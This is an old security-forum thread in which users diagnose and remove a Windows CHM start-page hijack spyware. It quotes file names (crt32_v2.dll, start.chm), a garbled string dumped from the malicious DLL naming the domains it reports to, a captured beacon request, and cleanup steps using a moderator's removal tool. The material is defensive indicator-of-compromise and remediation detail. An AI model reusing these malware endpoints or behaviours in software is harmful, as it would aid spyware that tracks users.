Techfacts XP .... (works ok on 98-SE) shows the history line for example accessing (ugh !!) Notepad help ... now like this :-
Visited; Default@mk:@MSITStore:C:\WINDOWS\HELP\Notepad.chm::/default.htm
I believe I am right in thinking this is a perfectly legitimate Windows statement ... the MSITStore is the MS on-line help facility ??, don't know about the @mk part ??.... But even I can see this is possibly a creaky piece of software ... How can Windows know if the .htm is unsafe or just part of another software's help ?????
Very helpful here, thanks folks.
Pipme (Makino)
DB123
April 27th, 2004, 02:55 PM
Running post (I'm always tooooo busy), hh.exe is a valid windows file, it's the hypertext help processor that loads CHM files. Think I posted this elsewhere but the exploit/spyware does not use hh.exe to do its stuff. I patched my copy of hh.exe to prompt whenever it was used - I got reinfected, but no warning popped up. This is probably because the class used for interpreting CHM files (IDocHTML or something, don't recall off the top of my head) is held in a different dll.
The post moved into this forum today titled as "Solution" does work...
Shadowwar
April 27th, 2004, 03:16 PM
Edit. I goofed! ::)
DB123
April 27th, 2004, 04:05 PM
Maybe I'm getting confused now, but I definitely saw a reference to wininet.dll somewhere which is perhaps where the retrieval was taking place. Also bear in mind that if it's obfuscated and the socket dll's are loaded with late binding (LoadLibrary, GetProcAddress etc), the only way to find it is by stepping through the code. Which I didn't want to do until I had a surefire way to clean it.
Fireflyer
April 27th, 2004, 04:51 PM
Shadowwar,
As I posted before, I renamed crt32_v2.dll (19.5 KB) and all my problems cleared up.
This snippet is from the file:
http://main.dlÁþîÿy-news-com./report¶ûísta.php?9= ;t*{ûibssy!ems8SOFTWAø°êRE\
The reference to main-news-com.com and tibssystems.com seems apparent to me. Also, when it was "phoning home", the Proxo header looked like this:
+++GET 1621+++
GET /report/reportstats.php?cid=a1a35e01-814e-11d8-9cdf-etc.
with the reference to report and .php as seen above.
I am using W98SE and offline browsing is working fine.
Tminus
April 29th, 2004, 03:26 AM
Hello everyone,
I had this problem and every time the nice folks on these forums, such as Pieter Arntz and CrazyM, would kindly give me suggestions the bugger kept coming back.
I finally found a thread (thanks to Grummy) that helped me get rid of it, for good this time (fingers crossed). A person that goes by Shadowwar has created a fix for this. If you have this problem then you need to look at this thread:
http://forums.net-integration.net/i...showtopic=13515
Thank you, everyone for your help!
Travis
Tminus
April 29th, 2004, 03:45 AM
Almost forgot,
After you perform this fix, YOU MUST DOWNLOAD ALL CRITICAL UPDATES. It's a new exploit that Microsoft just released a patch to fix.
Don't forget to delete all temporary internet files and offline content too. Check your "notepad.exe" properties on your hard drive to make sure they are Microsoft. You should have more than one "notepad.exe" on your hard drive so check them all.
Take it easy :)
Travis
Pieter_Arntz
April 29th, 2004, 03:50 AM
Travis,
I know you mean well, but I would like to point out our policy regarding help in this forum: http://www.wilderssecurity.com/showthread.php?t=26290
One other point. The person that came up with the fix (Shadowwar) is a Moderator at this forum, so you don't have to worry about us not being aware of its existence.
I removed the other posts regarding this object you posted and merged these posts with the other thread regarding this subject.
Regards,
Pieter
Tminus
April 29th, 2004, 04:12 AM
Pieter, It must be difficult to make sure that everyone is getting the best advice on a forum of this size.
I have to admit I am a little embarrassed. When I first came to this forum, looking for help with this Hijack, I read the post that you referenced, but at the time, I did not understand what it meant. I thought that perhaps it was meant only for those who give advice on the HijackThis logs, which I wasn't doing. Sorry for the misunderstanding.
Travis
Pieter_Arntz
April 29th, 2004, 05:07 AM
No problem. Those forums consist of two separate parts. One where the "live help" is given and one where we post the fixes for the most common and hard to fix infections.
The discussion among members about fixes they found is done here in Privacy Problems. That is probably not the clearest way to set it up, but those forums are relatively young and still "developing"
Regards,
Pieter
Shadowwar
April 29th, 2004, 08:51 AM
I goofed. >:( ::)
I dumped the 20k file and lo and behold all the urls that this thing contacts are in there. It is not a valid windows file. The other 4k dll i got from someone threw me for a total loop.
This one is unique in using the extensions key. Never saw one use that before.
Of course Hijackthis doesn't show that one. :o
got overly cautious with this thing cause i never dealt with an extension hijack.
Moral of the story.. If it smells like a rat. Looks like a rat. It must be a rat.
*puppy*
Grummy
April 30th, 2004, 10:39 PM
Just a heads up. If your HijackThis Log file contains :
mk:@MSITStore:C:\WINDOWS\start.chm::/start.html
Then this tool developed by Shadowwar will kill the CHM Hijack:
Please download this tool to fix the start.chm hijack.
http://tools.zerosrealm.com/startchmfix.exe
Download it to preferably the Desktop . Run it and it will extract the folder to the desktop.
Open the folder after extracted.
Please make sure all Internet Explorers are closed.
Double click the fix.bat
Only run it once or you will lose the backups although they shouldn't be needed.
Notepad will open at the end with a message and the bad file listing at the end. Please post that bad file listing line here. The Tool is designed so that if it is unable to remove the file, it will tell the user to reboot and will remove it on Reboot.
If no files show in the bad file listing then do a Reboot and do a search for either of these highlighted files and DELETE them:
C:\Windows\System32\ C_10230.DLL or
C:\Windows\System\crt32_v2.dll
Reboot and rescan with HijackThis and post a new log file.
Don't forget to delete all temporary internet files and offline content too.
Most Important, Go to Windows Update and install ALL critical updates.
rem2@sbcglobal.net
September 3rd, 2004, 02:54 PM
Shadowwar's routine worked like a charm
C:\Windows\System\crt32_v2.dll
Copyright ©2002 - 2009, Wilders Security Forums